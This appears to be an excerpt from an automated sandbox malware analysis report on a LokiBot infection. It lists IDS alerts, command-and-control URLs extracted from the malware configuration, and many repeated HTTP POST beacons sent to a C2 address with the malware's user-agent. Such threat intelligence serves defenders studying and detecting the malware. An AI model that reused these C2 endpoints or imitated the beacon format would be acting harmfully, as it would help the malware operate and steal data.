Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50066
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50037
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49982
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50067
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50042
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 94.156.177.220 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor URLs: 94.156.177.220/skipo/five/fre.php
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 94.156.177.220 94.156.177.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 180Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 180Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /skipo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E1DD60CAContent-Length: 153Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.177.220
